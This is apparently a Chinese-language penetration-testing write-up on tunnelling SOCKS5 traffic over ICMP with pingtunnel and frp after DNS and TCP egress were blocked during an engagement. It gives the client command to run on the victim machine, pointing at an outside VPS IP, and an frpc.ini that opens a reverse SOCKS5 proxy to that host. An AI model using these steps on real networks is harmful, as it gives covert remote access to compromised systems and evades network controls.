ICMP 隧道搭建

搭建 icmp 隧道转发 socks5 流量。

一、前言

这次实战中遇到了DNS、TCP不出网，ICMP出网的情况，而reGeorg不够稳定，于是考虑搭建ICMP隧道转发socks5流量。

二、原理及工具

pingtunnel是把tcp/udp/sock5流量伪装成icmp流量进行转发的工具。用于突破网络封锁，或是绕过WIFI网络的登陆验证，或是在某些网络加快网络传输速度。

三、隧道搭建

1、建立ICMP通道

受害机

1

F:\TEMP\pingtunnel32.exe -type client -l :4455 -s 118.178.88.46 -sock5 1

vps

1

./pingtunnel -type server

2、确认socks5流量封装成ICMP并转发，测试出网（可忽略）

别用IE的套接字当做socks5代理，proxifier全局代理或者浏览器socks5插件

3、开启frp代理

Frpc.ini

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

[common]
server_addr = 118.178.88.46
server_port = 7000
http_proxy = socks5://127.0.0.1:4455
tls_enable = true

[plugin_socks5]
type = tcp
remote_port = 6667
plugin = socks5
use_compression = true

这里的关键是frp去连接服务端时需要配置本地socks5代理。

最后，感谢戴哥哥和超哥的耐心解答。

四、参考

https://github.com/esrrhs/pingtunnel